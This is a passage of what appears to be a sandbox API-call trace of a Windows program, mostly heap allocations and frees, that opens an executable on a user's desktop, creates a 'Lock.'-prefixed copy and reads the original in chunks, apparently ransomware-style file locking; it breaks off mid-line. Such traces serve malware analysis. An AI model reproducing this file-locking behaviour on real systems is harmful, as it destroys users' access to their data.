HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0189.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0189.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0189.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0189.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0189.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0189.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0189.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0189.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0189.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0189.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0189.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0189.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0189.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0189.924] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/O4GkFtfMO8YRUkhr.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\o4gkftfmo8yrukhr.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0189.924] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.924] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0189.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0189.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0189.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0189.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0189.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0189.926] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0189.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0189.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0189.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0189.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0189.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0189.926] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.O4GkFtfMO8YRUkhr.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.o4gkftfmo8yrukhr.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0189.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0189.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0189.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0189.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0189.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0189.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0189.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0189.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0189.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0189.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0189.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0189.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe54020 [0189.935] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0189.935] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0189.939] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0189.941] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0189.943] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.030] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.034] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.036] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.038] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.040] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.043] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, 